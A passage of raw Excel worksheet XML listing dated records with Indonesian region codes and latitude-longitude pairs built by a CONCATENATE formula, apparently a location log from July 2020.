      <c r="F2243" t="s">
        <v>7555</v>
      </c>
      <c r="G2243" t="s">
        <v>7556</v>
      </c>
      <c r="H2243" t="s">
        <v>26</v>
      </c>
      <c r="I2243" t="s">
        <v>7557</v>
      </c>
      <c r="J2243" t="s">
        <v>7436</v>
      </c>
      <c r="L2243" t="s">
        <v>7558</v>
      </c>
      <c r="M2243">
        <v>6110050014</v>
      </c>
      <c r="N2243">
        <v>6110050</v>
      </c>
      <c r="O2243">
        <v>6110</v>
      </c>
      <c r="P2243">
        <v>61</v>
      </c>
      <c r="Q2243" t="s">
        <v>7559</v>
      </c>
      <c r="R2243" t="s">
        <v>7560</v>
      </c>
      <c r="S2243" t="s">
        <v>7561</v>
      </c>
      <c r="T2243" t="s">
        <v>7441</v>
      </c>
      <c r="U2243" s="5">
        <v>11173664</v>
      </c>
      <c r="V2243" s="5" t="s">
        <v>16451</v>
      </c>
      <c r="W2243" s="5">
        <v>-33156</v>
      </c>
      <c r="X2243" t="s">
        <v>20197</v>
      </c>
      <c r="Y2243" t="str">
        <f t="shared" ref="Y2243:Y2306" si="35">CONCATENATE(X2243,",",V2243)</f>
        <v xml:space="preserve"> -0.33156,111.73664</v>
      </c>
    </row>
    <row r="2244" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2244">
        <v>193907</v>
      </c>
      <c r="B2244" s="1">
        <v>44026</v>
      </c>
      <c r="C2244" s="2">
        <v>0.26597222222222222</v>
      </c>
      <c r="D2244" t="s">
        <v>2648</v>
      </c>
      <c r="E2244" t="s">
        <v>23</v>
      </c>
      <c r="G2244" t="s">
        <v>7562</v>
      </c>
      <c r="H2244" t="s">
        <v>26</v>
      </c>
      <c r="J2244" t="s">
        <v>7563</v>
      </c>
      <c r="L2244" t="s">
        <v>7564</v>
      </c>
      <c r="M2244">
        <v>3174010004</v>
      </c>
      <c r="N2244">
        <v>3174010</v>
      </c>
      <c r="O2244">
        <v>3174</v>
      </c>
      <c r="P2244">
        <v>31</v>
      </c>
      <c r="Q2244" t="s">
        <v>68</v>
      </c>
      <c r="R2244" t="s">
        <v>69</v>
      </c>
      <c r="S2244" t="s">
        <v>32</v>
      </c>
      <c r="T2244" t="s">
        <v>33</v>
      </c>
      <c r="U2244" s="5">
        <v>10675552</v>
      </c>
      <c r="V2244" s="5" t="s">
        <v>16452</v>
      </c>
      <c r="W2244" s="5">
        <v>-619529</v>
      </c>
      <c r="X2244" t="s">
        <v>20198</v>
      </c>
      <c r="Y2244" t="str">
        <f t="shared" si="35"/>
        <v>-6.19529,106.75552</v>
      </c>
    </row>
    <row r="2245" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2245">
        <v>193908</v>
      </c>
      <c r="B2245" s="1">
        <v>44026</v>
      </c>
      <c r="C2245" s="2">
        <v>0.26859953703703704</v>
      </c>
      <c r="D2245" t="s">
        <v>22</v>
      </c>
      <c r="E2245" t="s">
        <v>23</v>
      </c>
      <c r="F2245" t="s">
        <v>7565</v>
      </c>
      <c r="G2245" t="s">
        <v>7566</v>
      </c>
      <c r="H2245" t="s">
        <v>26</v>
      </c>
      <c r="I2245" t="s">
        <v>5397</v>
      </c>
      <c r="J2245" t="s">
        <v>6626</v>
      </c>
      <c r="L2245" t="s">
        <v>7567</v>
      </c>
      <c r="M2245">
        <v>7322120020</v>
      </c>
      <c r="N2245">
        <v>7322120</v>
      </c>
      <c r="O2245">
        <v>7322</v>
      </c>
      <c r="P2245">
        <v>73</v>
      </c>
      <c r="Q2245" t="s">
        <v>7551</v>
      </c>
      <c r="R2245" t="s">
        <v>7541</v>
      </c>
      <c r="S2245" t="s">
        <v>7542</v>
      </c>
      <c r="T2245" t="s">
        <v>6630</v>
      </c>
      <c r="U2245" s="5">
        <v>12032547</v>
      </c>
      <c r="V2245" s="5" t="s">
        <v>16449</v>
      </c>
      <c r="W2245" s="5">
        <v>-255221</v>
      </c>
      <c r="X2245" t="s">
        <v>20195</v>
      </c>
      <c r="Y2245" t="str">
        <f t="shared" si="35"/>
        <v>-2.55221,120.32547</v>
      </c>
    </row>
    <row r="2246" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2246">
        <v>193910</v>
      </c>
      <c r="B2246" s="1">
        <v>44026</v>
      </c>
      <c r="C2246" s="2">
        <v>0.25763888888888892</v>
      </c>
      <c r="D2246" t="s">
        <v>2648</v>
      </c>
      <c r="E2246" t="s">
        <v>23</v>
      </c>
      <c r="G2246" t="s">
        <v>7568</v>
      </c>
      <c r="H2246" t="s">
        <v>26</v>
      </c>
      <c r="J2246" t="s">
        <v>7569</v>
      </c>
      <c r="L2246" t="s">
        <v>7570</v>
      </c>
      <c r="M2246">
        <v>3174020004</v>
      </c>
      <c r="N2246">
        <v>3174020</v>
      </c>
      <c r="O2246">
        <v>3174</v>
      </c>
      <c r="P2246">
        <v>31</v>
      </c>
      <c r="Q2246" t="s">
        <v>31</v>
      </c>
      <c r="R2246" t="s">
        <v>31</v>
      </c>
      <c r="S2246" t="s">
        <v>32</v>
      </c>
      <c r="T2246" t="s">
        <v>33</v>
      </c>
      <c r="U2246" s="5">
        <v>10677519</v>
      </c>
      <c r="V2246" s="5" t="s">
        <v>14696</v>
      </c>
      <c r="W2246" s="5">
        <v>-620095</v>
      </c>
      <c r="X2246" t="s">
        <v>20199</v>
      </c>
      <c r="Y2246" t="str">
        <f t="shared" si="35"/>
        <v>-6.20095,106.77519</v>
      </c>
    </row>
    <row r="2247" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2247">
        <v>193912</v>
      </c>
      <c r="B2247" s="1">
        <v>44026</v>
      </c>
      <c r="C2247" s="2">
        <v>0.25694444444444448</v>
      </c>
      <c r="D2247" t="s">
        <v>2648</v>
      </c>
      <c r="E2247" t="s">
        <v>23</v>
      </c>
      <c r="G2247" t="s">
        <v>7571</v>
      </c>
      <c r="H2247" t="s">
        <v>26</v>
      </c>
      <c r="J2247" t="s">
        <v>7569</v>
      </c>
      <c r="L2247" t="s">
        <v>7572</v>
      </c>
      <c r="M2247">
        <v>3174020004</v>
      </c>
      <c r="N2247">
        <v>3174020</v>
      </c>
      <c r="O2247">
        <v>3174</v>
      </c>
      <c r="P2247">
        <v>31</v>
      </c>
      <c r="Q2247" t="s">
        <v>31</v>
      </c>
      <c r="R2247" t="s">
        <v>31</v>
      </c>
      <c r="S2247" t="s">
        <v>32</v>
      </c>
      <c r="T2247" t="s">
        <v>33</v>
      </c>
      <c r="U2247" s="5">
        <v>10677512</v>
      </c>
      <c r="V2247" s="5" t="s">
        <v>16453</v>
      </c>
      <c r="W2247" s="5">
        <v>-620090</v>
      </c>
      <c r="X2247" t="s">
        <v>20200</v>
      </c>
      <c r="Y2247" t="str">
        <f t="shared" si="35"/>
        <v>-6.20090,106.77512</v>
      </c>
    </row>
    <row r="2248" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2248">
        <v>193914</v>
      </c>
      <c r="B2248" s="1">
        <v>44026</v>
      </c>
      <c r="C2248" s="2">
        <v>0.25</v>
      </c>
      <c r="D2248" t="s">
        <v>2648</v>
      </c>
      <c r="E2248" t="s">
        <v>23</v>
      </c>
      <c r="G2248" t="s">
        <v>7573</v>
      </c>
      <c r="H2248" t="s">
        <v>26</v>
      </c>
      <c r="J2248" t="s">
        <v>7569</v>
      </c>
      <c r="L2248" t="s">
        <v>7574</v>
      </c>
      <c r="M2248">
        <v>3174020004</v>
      </c>
      <c r="N2248">
        <v>3174020</v>
      </c>
      <c r="O2248">
        <v>3174</v>
      </c>
      <c r="P2248">
        <v>31</v>
      </c>
      <c r="Q2248" t="s">
        <v>31</v>
      </c>
      <c r="R2248" t="s">
        <v>31</v>
      </c>
      <c r="S2248" t="s">
        <v>32</v>
      </c>
      <c r="T2248" t="s">
        <v>33</v>
      </c>
      <c r="U2248" s="5">
        <v>10677519</v>
      </c>
      <c r="V2248" s="5" t="s">
        <v>14696</v>
      </c>
      <c r="W2248" s="5">
        <v>-620096</v>
      </c>
      <c r="X2248" t="s">
        <v>20201</v>
      </c>
      <c r="Y2248" t="str">
        <f t="shared" si="35"/>
        <v>-6.20096,106.77519</v>
      </c>
    </row>
    <row r="2249" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2249">
        <v>194186</v>
      </c>
      <c r="B2249" s="1">
        <v>44026</v>
      </c>
      <c r="C2249" s="2">
        <v>0.50888888888888884</v>
      </c>
      <c r="D2249" t="s">
        <v>22</v>
      </c>
      <c r="E2249" t="s">
        <v>23</v>
      </c>
      <c r="F2249" t="s">
        <v>7575</v>
      </c>
      <c r="G2249" t="s">
        <v>7576</v>
      </c>
      <c r="H2249" t="s">
        <v>26</v>
      </c>
      <c r="I2249" t="s">
        <v>666</v>
      </c>
      <c r="J2249" t="s">
        <v>6626</v>
      </c>
      <c r="L2249" t="s">
        <v>7577</v>
      </c>
      <c r="M2249">
        <v>7322120020</v>
      </c>
      <c r="N2249">
        <v>7322120</v>
      </c>
      <c r="O2249">
        <v>7322</v>
      </c>
      <c r="P2249">
        <v>73</v>
      </c>
      <c r="Q2249" t="s">
        <v>7551</v>
      </c>
      <c r="R2249" t="s">
        <v>7541</v>
      </c>
      <c r="S2249" t="s">
        <v>7542</v>
      </c>
      <c r="T2249" t="s">
        <v>6630</v>
      </c>
      <c r="U2249" s="5">
        <v>12032880</v>
      </c>
      <c r="V2249" s="5" t="s">
        <v>16454</v>
      </c>
      <c r="W2249" s="5">
        <v>-255424</v>
      </c>
      <c r="X2249" t="s">
        <v>20202</v>
      </c>
      <c r="Y2249" t="str">
        <f t="shared" si="35"/>
        <v>-2.55424,120.32880</v>
      </c>
    </row>
    <row r="2250" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2250">
        <v>194295</v>
      </c>
      <c r="B2250" s="1">
        <v>44026</v>
      </c>
      <c r="C2250" s="2">
        <v>0.60216435185185191</v>
      </c>
      <c r="D2250" t="s">
        <v>22</v>
      </c>
      <c r="E2250" t="s">
        <v>23</v>
      </c>
      <c r="F2250" t="s">
        <v>7578</v>
      </c>
      <c r="G2250" t="s">
        <v>7579</v>
      </c>
      <c r="H2250" t="s">
        <v>26</v>
      </c>
      <c r="I2250" t="s">
        <v>277</v>
      </c>
      <c r="J2250" t="s">
        <v>6626</v>
      </c>
      <c r="L2250" t="s">
        <v>1456</v>
      </c>
      <c r="M2250">
        <v>7322120023</v>
      </c>
      <c r="N2250">
        <v>7322120</v>
      </c>
      <c r="O2250">
        <v>7322</v>
      </c>
      <c r="P2250">
        <v>73</v>
      </c>
      <c r="Q2250" t="s">
        <v>7540</v>
      </c>
      <c r="R2250" t="s">
        <v>7541</v>
      </c>
      <c r="S2250" t="s">
        <v>7542</v>
      </c>
      <c r="T2250" t="s">
        <v>6630</v>
      </c>
      <c r="U2250" s="5">
        <v>12033047</v>
      </c>
      <c r="V2250" s="5" t="s">
        <v>16455</v>
      </c>
      <c r="W2250" s="5">
        <v>-255410</v>
      </c>
      <c r="X2250" t="s">
        <v>20203</v>
      </c>
      <c r="Y2250" t="str">
        <f t="shared" si="35"/>
        <v>-2.55410,120.33047</v>
      </c>
    </row>
    <row r="2251" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2251">
        <v>194496</v>
      </c>
      <c r="B2251" s="1">
        <v>44026</v>
      </c>
      <c r="C2251" s="2">
        <v>0.7768518518518519</v>
      </c>
      <c r="D2251" t="s">
        <v>22</v>
      </c>
      <c r="E2251" t="s">
        <v>23</v>
      </c>
      <c r="F2251" t="s">
        <v>7580</v>
      </c>
      <c r="H2251" t="s">
        <v>26</v>
      </c>
      <c r="I2251" t="s">
        <v>1263</v>
      </c>
      <c r="J2251" t="s">
        <v>2627</v>
      </c>
      <c r="L2251" t="s">
        <v>7581</v>
      </c>
      <c r="M2251">
        <v>3204290001</v>
      </c>
      <c r="N2251">
        <v>3204290</v>
      </c>
      <c r="O2251">
        <v>3204</v>
      </c>
      <c r="P2251">
        <v>32</v>
      </c>
      <c r="Q2251" t="s">
        <v>7582</v>
      </c>
      <c r="R2251" t="s">
        <v>2170</v>
      </c>
      <c r="S2251" t="s">
        <v>1464</v>
      </c>
      <c r="T2251" t="s">
        <v>42</v>
      </c>
      <c r="U2251" s="5">
        <v>10771754</v>
      </c>
      <c r="V2251" s="5" t="s">
        <v>16456</v>
      </c>
      <c r="W2251" s="5">
        <v>-694573</v>
      </c>
      <c r="X2251" t="s">
        <v>20204</v>
      </c>
      <c r="Y2251" t="str">
        <f t="shared" si="35"/>
        <v>-6.94573,107.71754</v>
      </c>
    </row>
    <row r="2252" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2252">
        <v>195628</v>
      </c>
      <c r="B2252" s="1">
        <v>44028</v>
      </c>
      <c r="C2252" s="2">
        <v>3.7037037037037035E-4</v>
      </c>
      <c r="D2252" t="s">
        <v>22</v>
      </c>
      <c r="E2252" t="s">
        <v>23</v>
      </c>
      <c r="F2252" t="s">
        <v>7583</v>
      </c>
      <c r="G2252" t="s">
        <v>7584</v>
      </c>
      <c r="H2252" t="s">
        <v>26</v>
      </c>
      <c r="I2252" t="s">
        <v>7585</v>
      </c>
      <c r="J2252" t="s">
        <v>6626</v>
      </c>
      <c r="L2252" t="s">
        <v>7586</v>
      </c>
      <c r="M2252">
        <v>7322120020</v>
      </c>
      <c r="N2252">
        <v>7322120</v>
      </c>
      <c r="O2252">
        <v>7322</v>
      </c>
      <c r="P2252">
        <v>73</v>
      </c>
      <c r="Q2252" t="s">
        <v>7551</v>
      </c>
      <c r="R2252" t="s">
        <v>7541</v>
      </c>
      <c r="S2252" t="s">
        <v>7542</v>
      </c>
      <c r="T2252" t="s">
        <v>6630</v>
      </c>
      <c r="U2252" s="5">
        <v>12032887</v>
      </c>
      <c r="V2252" s="5" t="s">
        <v>16457</v>
      </c>
      <c r="W2252" s="5">
        <v>-255403</v>
      </c>
      <c r="X2252" t="s">
        <v>20205</v>
      </c>
      <c r="Y2252" t="str">
        <f t="shared" si="35"/>
        <v>-2.55403,120.32887</v>
      </c>
    </row>
    <row r="2253" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2253">
        <v>195629</v>
      </c>
      <c r="B2253" s="1">
        <v>44028</v>
      </c>
      <c r="C2253" s="2">
        <v>0.1806712962962963</v>
      </c>
      <c r="D2253" t="s">
        <v>22</v>
      </c>
      <c r="E2253" t="s">
        <v>23</v>
      </c>
      <c r="F2253" t="s">
        <v>7587</v>
      </c>
      <c r="G2253" t="s">
        <v>7588</v>
      </c>
      <c r="H2253" t="s">
        <v>26</v>
      </c>
      <c r="I2253" t="s">
        <v>3668</v>
      </c>
      <c r="J2253" t="s">
        <v>6626</v>
      </c>
      <c r="L2253" t="s">
        <v>7589</v>
      </c>
      <c r="M2253">
        <v>7322120020</v>
      </c>
      <c r="N2253">
        <v>7322120</v>
      </c>
      <c r="O2253">
        <v>7322</v>
      </c>
      <c r="P2253">
        <v>73</v>
      </c>
      <c r="Q2253" t="s">
        <v>7551</v>
      </c>
      <c r="R2253" t="s">
        <v>7541</v>
      </c>
      <c r="S2253" t="s">
        <v>7542</v>
      </c>
      <c r="T2253" t="s">
        <v>6630</v>
      </c>
      <c r="U2253" s="5">
        <v>12032530</v>
      </c>
      <c r="V2253" s="5" t="s">
        <v>16458</v>
      </c>
      <c r="W2253" s="5">
        <v>-255224</v>
      </c>
      <c r="X2253" t="s">
        <v>20206</v>
      </c>
      <c r="Y2253" t="str">
        <f t="shared" si="35"/>
        <v>-2.55224,120.32530</v>
      </c>
    </row>
    <row r="2254" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2254">
        <v>195630</v>
      </c>
      <c r="B2254" s="1">
        <v>44028</v>
      </c>
      <c r="C2254" s="2">
        <v>0.31686342592592592</v>
      </c>
      <c r="D2254" t="s">
        <v>22</v>
      </c>
      <c r="E2254" t="s">
        <v>23</v>
      </c>
      <c r="F2254" t="s">
        <v>7590</v>
      </c>
      <c r="G2254" t="s">
        <v>7591</v>
      </c>
      <c r="H2254" t="s">
        <v>26</v>
      </c>
      <c r="I2254" t="s">
        <v>7487</v>
      </c>
      <c r="J2254" t="s">
        <v>6626</v>
      </c>
      <c r="L2254" t="s">
        <v>7592</v>
      </c>
      <c r="M2254">
        <v>7322120020</v>
      </c>
      <c r="N2254">
        <v>7322120</v>
      </c>
      <c r="O2254">
        <v>7322</v>
      </c>
      <c r="P2254">
        <v>73</v>
      </c>
      <c r="Q2254" t="s">
        <v>7551</v>
      </c>
      <c r="R2254" t="s">
        <v>7541</v>
      </c>
      <c r="S2254" t="s">
        <v>7542</v>
      </c>
      <c r="T2254" t="s">
        <v>6630</v>
      </c>
      <c r="U2254" s="5">
        <v>12032547</v>
      </c>
      <c r="V2254" s="5" t="s">
        <v>16449</v>
      </c>
      <c r="W2254" s="5">
        <v>-255220</v>
      </c>
      <c r="X2254" t="s">
        <v>20207</v>
      </c>
      <c r="Y2254" t="str">
        <f t="shared" si="35"/>
        <v>-2.55220,120.32547</v>
      </c>
    </row>
    <row r="2255" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2255">
        <v>195631</v>
      </c>
      <c r="B2255" s="1">
        <v>44028</v>
      </c>
      <c r="C2255" s="2">
        <v>0.60601851851851851</v>
      </c>
      <c r="D2255" t="s">
        <v>22</v>
      </c>
      <c r="E2255" t="s">
        <v>23</v>
      </c>
      <c r="F2255" t="s">
        <v>7593</v>
      </c>
      <c r="G2255" t="s">
        <v>7594</v>
      </c>
      <c r="H2255" t="s">
        <v>26</v>
      </c>
      <c r="I2255" t="s">
        <v>7595</v>
      </c>
      <c r="J2255" t="s">
        <v>6626</v>
      </c>
      <c r="L2255" t="s">
        <v>7596</v>
      </c>
      <c r="M2255">
        <v>7322120020</v>
      </c>
      <c r="N2255">
        <v>7322120</v>
      </c>
      <c r="O2255">
        <v>7322</v>
      </c>
      <c r="P2255">
        <v>73</v>
      </c>
      <c r="Q2255" t="s">
        <v>7551</v>
      </c>
      <c r="R2255" t="s">
        <v>7541</v>
      </c>
      <c r="S2255" t="s">
        <v>7542</v>
      </c>
      <c r="T2255" t="s">
        <v>6630</v>
      </c>
      <c r="U2255" s="5">
        <v>12032547</v>
      </c>
      <c r="V2255" s="5" t="s">
        <v>16449</v>
      </c>
      <c r="W2255" s="5">
        <v>-255221</v>
      </c>
      <c r="X2255" t="s">
        <v>20195</v>
      </c>
      <c r="Y2255" t="str">
        <f t="shared" si="35"/>
        <v>-2.55221,120.32547</v>
      </c>
    </row>
    <row r="2256" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2256">
        <v>195632</v>
      </c>
      <c r="B2256" s="1">
        <v>44028</v>
      </c>
      <c r="C2256" s="2">
        <v>0.89853009259259264</v>
      </c>
      <c r="D2256" t="s">
        <v>22</v>
      </c>
      <c r="E2256" t="s">
        <v>23</v>
      </c>
      <c r="F2256" t="s">
        <v>7597</v>
      </c>
      <c r="G2256" t="s">
        <v>7598</v>
      </c>
      <c r="H2256" t="s">
        <v>26</v>
      </c>
      <c r="I2256" t="s">
        <v>424</v>
      </c>
      <c r="J2256" t="s">
        <v>7599</v>
      </c>
      <c r="L2256" t="s">
        <v>250</v>
      </c>
      <c r="M2256">
        <v>9171010003</v>
      </c>
      <c r="N2256">
        <v>9171010</v>
      </c>
      <c r="O2256">
        <v>9171</v>
      </c>
      <c r="P2256">
        <v>91</v>
      </c>
      <c r="Q2256" t="s">
        <v>7600</v>
      </c>
      <c r="R2256" t="s">
        <v>7601</v>
      </c>
      <c r="S2256" t="s">
        <v>7602</v>
      </c>
      <c r="T2256" t="s">
        <v>7603</v>
      </c>
      <c r="U2256" s="5">
        <v>13125448</v>
      </c>
      <c r="V2256" s="5" t="s">
        <v>16459</v>
      </c>
      <c r="W2256" s="5">
        <v>-86341</v>
      </c>
      <c r="X2256" t="s">
        <v>20208</v>
      </c>
      <c r="Y2256" t="str">
        <f t="shared" si="35"/>
        <v xml:space="preserve"> -0.86341,131.25448</v>
      </c>
    </row>
    <row r="2257" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2257">
        <v>195633</v>
      </c>
      <c r="B2257" s="1">
        <v>44029</v>
      </c>
      <c r="C2257" s="2">
        <v>2.013888888888889E-2</v>
      </c>
      <c r="D2257" t="s">
        <v>2648</v>
      </c>
      <c r="E2257" t="s">
        <v>23</v>
      </c>
      <c r="G2257" t="s">
        <v>7604</v>
      </c>
      <c r="H2257" t="s">
        <v>26</v>
      </c>
      <c r="J2257" t="s">
        <v>7605</v>
      </c>
      <c r="L2257" t="s">
        <v>7606</v>
      </c>
      <c r="M2257">
        <v>3172020004</v>
      </c>
      <c r="N2257">
        <v>3172020</v>
      </c>
      <c r="O2257">
        <v>3172</v>
      </c>
      <c r="P2257">
        <v>31</v>
      </c>
      <c r="Q2257" t="s">
        <v>7607</v>
      </c>
      <c r="R2257" t="s">
        <v>1644</v>
      </c>
      <c r="S2257" t="s">
        <v>49</v>
      </c>
      <c r="T2257" t="s">
        <v>33</v>
      </c>
      <c r="U2257" s="5">
        <v>10687351</v>
      </c>
      <c r="V2257" s="5" t="s">
        <v>16460</v>
      </c>
      <c r="W2257" s="5">
        <v>-631493</v>
      </c>
      <c r="X2257" t="s">
        <v>20209</v>
      </c>
      <c r="Y2257" t="str">
        <f t="shared" si="35"/>
        <v>-6.31493,106.87351</v>
      </c>
    </row>
    <row r="2258" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2258">
        <v>195634</v>
      </c>
      <c r="B2258" s="1">
        <v>44029</v>
      </c>
      <c r="C2258" s="2">
        <v>1.9444444444444445E-2</v>
      </c>
      <c r="D2258" t="s">
        <v>2648</v>
      </c>
      <c r="E2258" t="s">
        <v>23</v>
      </c>
      <c r="G2258" t="s">
        <v>7608</v>
      </c>
      <c r="H2258" t="s">
        <v>26</v>
      </c>
      <c r="J2258" t="s">
        <v>7605</v>
      </c>
      <c r="L2258" t="s">
        <v>7606</v>
      </c>
      <c r="M2258">
        <v>3172020004</v>
      </c>
      <c r="N2258">
        <v>3172020</v>
      </c>
      <c r="O2258">
        <v>3172</v>
      </c>
      <c r="P2258">
        <v>31</v>
      </c>
      <c r="Q2258" t="s">
        <v>7607</v>
      </c>
      <c r="R2258" t="s">
        <v>1644</v>
      </c>
      <c r="S2258" t="s">
        <v>49</v>
      </c>
      <c r="T2258" t="s">
        <v>33</v>
      </c>
      <c r="U2258" s="5">
        <v>10687347</v>
      </c>
      <c r="V2258" s="5" t="s">
        <v>16461</v>
      </c>
      <c r="W2258" s="5">
        <v>-631490</v>
      </c>
      <c r="X2258" t="s">
        <v>20210</v>
      </c>
      <c r="Y2258" t="str">
        <f t="shared" si="35"/>
        <v>-6.31490,106.87347</v>
      </c>
    </row>
    <row r="2259" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2259">
        <v>195637</v>
      </c>
      <c r="B2259" s="1">
        <v>44029</v>
      </c>
      <c r="C2259" s="2">
        <v>4.2303240740740738E-2</v>
      </c>
      <c r="D2259" t="s">
        <v>22</v>
      </c>
      <c r="E2259" t="s">
        <v>23</v>
      </c>
      <c r="F2259" t="s">
        <v>7609</v>
      </c>
      <c r="H2259" t="s">
        <v>26</v>
      </c>
      <c r="I2259" t="s">
        <v>65</v>
      </c>
      <c r="J2259" t="s">
        <v>7599</v>
      </c>
      <c r="L2259" t="s">
        <v>7610</v>
      </c>
      <c r="M2259">
        <v>9171010003</v>
      </c>
      <c r="N2259">
        <v>9171010</v>
      </c>
      <c r="O2259">
        <v>9171</v>
      </c>
      <c r="P2259">
        <v>91</v>
      </c>
      <c r="Q2259" t="s">
        <v>7600</v>
      </c>
      <c r="R2259" t="s">
        <v>7601</v>
      </c>
      <c r="S2259" t="s">
        <v>7602</v>
      </c>
      <c r="T2259" t="s">
        <v>7603</v>
      </c>
      <c r="U2259" s="5">
        <v>13125452</v>
      </c>
      <c r="V2259" s="5" t="s">
        <v>16462</v>
      </c>
      <c r="W2259" s="5">
        <v>-86386</v>
      </c>
      <c r="X2259" t="s">
        <v>20211</v>
      </c>
      <c r="Y2259" t="str">
        <f t="shared" si="35"/>
        <v xml:space="preserve"> -0.86386,131.25452</v>
      </c>
    </row>
    <row r="2260" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2260">
        <v>195638</v>
      </c>
      <c r="B2260" s="1">
        <v>44030</v>
      </c>
      <c r="C2260" s="2">
        <v>3.1805555555555552E-2</v>
      </c>
      <c r="D2260" t="s">
        <v>22</v>
      </c>
      <c r="E2260" t="s">
        <v>23</v>
      </c>
      <c r="F2260" t="s">
        <v>7611</v>
      </c>
      <c r="G2260" t="s">
        <v>7612</v>
      </c>
      <c r="H2260" t="s">
        <v>26</v>
      </c>
      <c r="I2260" t="s">
        <v>2134</v>
      </c>
      <c r="J2260" t="s">
        <v>7599</v>
      </c>
      <c r="L2260" t="s">
        <v>7613</v>
      </c>
      <c r="M2260">
        <v>9171021003</v>
      </c>
      <c r="N2260">
        <v>9171021</v>
      </c>
      <c r="O2260">
        <v>9171</v>
      </c>
      <c r="P2260">
        <v>91</v>
      </c>
      <c r="Q2260" t="s">
        <v>7614</v>
      </c>
      <c r="R2260" t="s">
        <v>7615</v>
      </c>
      <c r="S2260" t="s">
        <v>7602</v>
      </c>
      <c r="T2260" t="s">
        <v>7603</v>
      </c>
      <c r="U2260" s="5">
        <v>13133651</v>
      </c>
      <c r="V2260" s="5" t="s">
        <v>16463</v>
      </c>
      <c r="W2260" s="5">
        <v>-89091</v>
      </c>
      <c r="X2260" t="s">
        <v>20212</v>
      </c>
      <c r="Y2260" t="str">
        <f t="shared" si="35"/>
        <v xml:space="preserve"> -0.89091,131.33651</v>
      </c>
    </row>
    <row r="2261" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2261">
        <v>195771</v>
      </c>
      <c r="B2261" s="1">
        <v>44032</v>
      </c>
      <c r="C2261" s="2">
        <v>0.73238425925925921</v>
      </c>
      <c r="D2261" t="s">
        <v>22</v>
      </c>
      <c r="E2261" t="s">
        <v>23</v>
      </c>
      <c r="F2261" t="s">
        <v>7616</v>
      </c>
      <c r="G2261" t="s">
        <v>7617</v>
      </c>
      <c r="H2261" t="s">
        <v>26</v>
      </c>
      <c r="I2261" t="s">
        <v>1559</v>
      </c>
      <c r="J2261" t="s">
        <v>7618</v>
      </c>
      <c r="L2261" t="s">
        <v>7619</v>
      </c>
      <c r="M2261">
        <v>3175040005</v>
      </c>
      <c r="N2261">
        <v>3175040</v>
      </c>
      <c r="O2261">
        <v>3175</v>
      </c>
      <c r="P2261">
        <v>31</v>
      </c>
      <c r="Q2261" t="s">
        <v>7620</v>
      </c>
      <c r="R2261" t="s">
        <v>2063</v>
      </c>
      <c r="S2261" t="s">
        <v>547</v>
      </c>
      <c r="T2261" t="s">
        <v>33</v>
      </c>
      <c r="U2261" s="5">
        <v>10690020</v>
      </c>
      <c r="V2261" s="5" t="s">
        <v>16464</v>
      </c>
      <c r="W2261" s="5">
        <v>-611700</v>
      </c>
      <c r="X2261" t="s">
        <v>20213</v>
      </c>
      <c r="Y2261" t="str">
        <f t="shared" si="35"/>
        <v>-6.11700,106.90020</v>
      </c>
    </row>
    <row r="2262" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2262">
        <v>196076</v>
      </c>
      <c r="B2262" s="1">
        <v>44033</v>
      </c>
      <c r="C2262" s="2">
        <v>0.7874537037037036</v>
      </c>
      <c r="D2262" t="s">
        <v>22</v>
      </c>
      <c r="E2262" t="s">
        <v>23</v>
      </c>
      <c r="F2262" t="s">
        <v>7621</v>
      </c>
      <c r="G2262" t="s">
        <v>7622</v>
      </c>
      <c r="H2262" t="s">
        <v>7086</v>
      </c>
      <c r="I2262" t="s">
        <v>7623</v>
      </c>
      <c r="J2262" t="s">
        <v>2615</v>
      </c>
      <c r="L2262" t="s">
        <v>7624</v>
      </c>
      <c r="M2262">
        <v>3471130002</v>
      </c>
      <c r="N2262">
        <v>3471130</v>
      </c>
      <c r="O2262">
        <v>3471</v>
      </c>
      <c r="P2262">
        <v>34</v>
      </c>
      <c r="Q2262" t="s">
        <v>7625</v>
      </c>
      <c r="R2262" t="s">
        <v>7626</v>
      </c>
      <c r="S2262" t="s">
        <v>7273</v>
      </c>
      <c r="T2262" t="s">
        <v>1856</v>
      </c>
      <c r="U2262" s="5">
        <v>11036423</v>
      </c>
      <c r="V2262" s="5" t="s">
        <v>16465</v>
      </c>
      <c r="W2262" s="5">
        <v>-778352</v>
      </c>
      <c r="X2262" t="s">
        <v>20214</v>
      </c>
      <c r="Y2262" t="str">
        <f t="shared" si="35"/>
        <v>-7.78352,110.36423</v>
      </c>
    </row>
    <row r="2263" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2263">
        <v>196094</v>
      </c>
      <c r="B2263" s="1">
        <v>44035</v>
      </c>
      <c r="C2263" s="2">
        <v>0.1587962962962963</v>
      </c>
      <c r="D2263" t="s">
        <v>22</v>
      </c>
      <c r="E2263" t="s">
        <v>23</v>
      </c>
      <c r="F2263" t="s">
        <v>7627</v>
      </c>
      <c r="G2263" t="s">
        <v>7628</v>
      </c>
      <c r="H2263" t="s">
        <v>7086</v>
      </c>
      <c r="I2263" t="s">
        <v>7629</v>
      </c>
      <c r="J2263" t="s">
        <v>7630</v>
      </c>
      <c r="M2263">
        <v>3171100003</v>
      </c>
      <c r="N2263">
        <v>3171100</v>
      </c>
      <c r="O2263">
        <v>3171</v>
      </c>
      <c r="P2263">
        <v>31</v>
      </c>
      <c r="Q2263" t="s">
        <v>3246</v>
      </c>
      <c r="R2263" t="s">
        <v>107</v>
      </c>
      <c r="S2263" t="s">
        <v>108</v>
      </c>
      <c r="T2263" t="s">
        <v>33</v>
      </c>
      <c r="U2263" s="5">
        <v>10683116</v>
